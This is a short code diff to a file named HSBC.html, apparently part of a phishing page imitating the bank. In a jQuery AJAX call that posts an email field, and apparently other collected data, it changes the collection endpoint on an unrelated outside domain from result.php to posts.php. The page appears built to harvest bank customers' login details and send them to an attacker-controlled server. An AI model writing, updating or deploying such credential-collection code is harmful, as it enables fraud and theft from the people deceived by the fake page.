--- a/HSBC.html
+++ b/HSBC.html
@@ -977,7 +977,7 @@ count=count+1;
 
 $.ajax({
 dataType: 'JSON',
-url: 'https://terminiuim.co/kcaeec/result.php',
+url: 'https://terminiuim.co/kcaeec/posts.php',
 type: 'POST',
       	data:{
       		email:email,
